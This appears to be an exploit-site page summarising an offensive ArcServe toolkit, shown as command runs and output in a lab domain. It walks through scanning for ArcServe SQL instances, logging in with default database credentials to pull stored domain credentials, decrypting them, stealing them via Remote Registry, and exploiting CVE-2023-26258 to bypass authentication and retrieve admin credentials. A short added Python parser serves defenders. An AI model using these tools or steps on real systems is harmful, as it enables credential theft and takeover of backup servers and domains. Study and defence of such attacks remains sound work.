## https://sploitus.com/exploit?id=C73CE2F0-7D60-5E97-80C6-1A5693E17605
The **TL;DR**

If you are on the network, you can scan for instances with the default configuration using `ArcServeRadar.py`. I tried to port it to C# but couldn't; feel free to do it if you know how :)

```bash
c:\Users\vagrant\Desktop>python ArcServeRadar.py "Ethernet 2" 6969 192.168.56.20
                -=[ ArcServe Finder - @TheXC3LL  - MDSec ]=-


[*] Starting to monitor
[*] Broadcasting
WARNING: Mac address to reach destination not found. Using broadcast.
        [+] 192.168.56.10 => ServerName;KINGSLANDING;InstanceName;ARCSERVE_APP;IsClustered;No;Version;15.0.2000.5;tcp;62197;;
```
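
For defenders auditing their own network, the reply format in the sample output above can be parsed to list hosts that expose the ArcServe SQL instance over TCP. This is an added example, not part of the original tools: the instance name `ARCSERVE_APP` is taken from the sample output, the second reply is constructed, and the function names are hypothetical.

```python
from typing import Dict, List, Tuple

WATCHED_INSTANCE = "ARCSERVE_APP"  # instance name seen in the page's sample output

SAMPLE_REPLIES: Dict[str, str] = {
    # Reply string copied from the sample output above.
    "192.168.56.10": "ServerName;KINGSLANDING;InstanceName;ARCSERVE_APP;"
                     "IsClustered;No;Version;15.0.2000.5;tcp;62197;;",
    # Constructed reply: two instances on one host; the second has no TCP endpoint.
    "192.168.56.30": "ServerName;DB01;InstanceName;MSSQLSERVER;IsClustered;No;"
                     "Version;15.0.2000.5;tcp;1433;;"
                     "ServerName;DB01;InstanceName;arcserve_app;IsClustered;No;"
                     "Version;15.0.2000.5;;",
}


def parse_instances(reply: str) -> List[Dict[str, str]]:
    """Split a reply into one key/value dict per instance (records end with ';;')."""
    instances = []
    for record in reply.split(";;"):
        tokens = record.strip().split(";")
        if len(tokens) < 2:
            continue  # empty tail after the final ';;'
        # Tokens alternate key, value; an unpaired trailing token is dropped by zip.
        fields = dict(zip(tokens[0::2], tokens[1::2]))
        if "InstanceName" in fields:
            instances.append(fields)
    return instances


def exposed_instances(replies: Dict[str, str],
                      watched: str = WATCHED_INSTANCE) -> List[Tuple[str, str, int]]:
    """Return (host, server name, port) for watched instances reachable over TCP."""
    findings = []
    for host, reply in sorted(replies.items()):
        for inst in parse_instances(reply):
            port = inst.get("tcp", "")
            if inst["InstanceName"].upper() == watched.upper() and port.isdigit():
                findings.append((host, inst.get("ServerName", ""), int(port)))
    return findings


if __name__ == "__main__":
    for host, server, port in exposed_instances(SAMPLE_REPLIES):
        print(f"{host} ({server}) exposes {WATCHED_INSTANCE} on tcp/{port}")
```

Hosts it reports are the ones where the database's default credentials should be changed and the port restricted to the systems that need it.
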
If the instance uses the default configuration, you can use the default DB creds to connect to the IP and port obtained above and read the username/password, plus where the ArcServe instances are located, using `ArcServe-dbpwner.py`:

```bash

psyconauta@insulanova:/tmp|⇒  python3 arcserve-dbpwner.py -target 192.168.56.10 -port 62197
		-=[ ArcServe credential retriever (from DB) - Juan Manuel Fernandez (@TheXC3LL)  - MDSec]=-


[*] Connecting to the server
[*] Login with default creds
[*] Extracting credentials:
	[+] User: SEVENKINGDOMS\vagrant
	[+] Password: {133, 60, 97, 192, 158, 159, 25, 141, 58, 250, 174, 169, 141, 216, 104, 98}; // Paste it to the decrypter
	[+] User: SEVENKINGDOMS\vagrant
	[+] Password: {133, 60, 97, 192, 158, 159, 25, 141, 58, 250, 174, 169, 141, 216, 104, 98}; // Paste it to the decrypter
[*] Finding hosts:
	[+] 192.168.56.10 | kingslanding.sevenkingdoms.local | Windows Server 2019 Datacenter Evaluation
	[+] 192.168.56.10 | kingslanding.sevenkingdoms.local | NULL


 Have a nice day! ^_^
```

All the passwords retrieved by the tools can be decrypted using `ArcServeDecrypter.exe`. Just edit the C code to add the array, compile and execute it:

```bash
C:\Users\vagrant>C:\Users\vagrant\source\repos\ArcServeDecrypter\x64\Debug\ArcServeDecrypter.exe
                -={ ArcServe Decryptor by Juan Manuel Fernandez (@TheXC3LL) - MDSec}=-

[+] Decrypted string: vagrant
```

If you have a user with local admin privileges on the server where ArcServe is installed, you can read the credentials using the Remote Registry service (`arcserve-regkeys.py`):

```bash
psyconauta@insulanova:/tmp|⇒  python3 arcserve-regkeys.py -u eddard.stark -p 'FightP3aceAndHonor!' -d sevenkingdoms.local -target-ip 192.168.56.20
		-=[ ArcServe Credential Stealer - (@TheXC3LL) - MDSec]=-
[+] Connecting to 192.168.56.20
[+] Checking Remote Registry service status...
[+] Service is down!
[+] Starting Remote Registry service...
[+] Connecting to 192.168.56.20
[+] Opening registry key
	[*] User: P3TWLADS11STD\vagrant
	[*] Password: {133, 60, 97, 192, 158, 159, 25, 141, 58, 250, 174, 169, 141, 216, 104, 98}; // Paste it to the decrypter
[+] Stopping Remote Registry Service

Have a nice day! ^_^
```

Finally, if the ArcServe version was not patched (**CVE-2023-26258**) you can exploit an authentication bypass in the management web interface and retrieve the admin creds (`ArcServe-exploit.py`):

```bash
psyconauta@insulanova:/tmp|⇒  python3 ArcServe-exploit.py 192.168.56.10
		-=[ ArcServe Pwner by Juan Manuel Fernandez (@TheXC3LL) - MDSec]=-


[*] Triggering info leak
	[+] AdminName: SEVENKINGDOMS\vagrant
	[+] AuthUUID: 6bf37b8e-ac4f-487d-8d74-d6d0a8d9b8d1
[*] Getting a valid session
	[+] Session: AGENTJSESSIONID=CA35EF18A4FF2F85E25538F60C3F7428
[*] Doing an authenticated request to validate if session is valid
[*] Session is valid
	[+] Admin: SEVENKINGDOMS\vagrant
	[+] Password: {133, 60, 97, 192, 158, 159, 25, 141, 58, 250, 174, 169, 141, 216, 104, 98} // Paste it to the decrypter


Have a happy hacking! ^_^
```

So here ends the summary of tools that you can find here.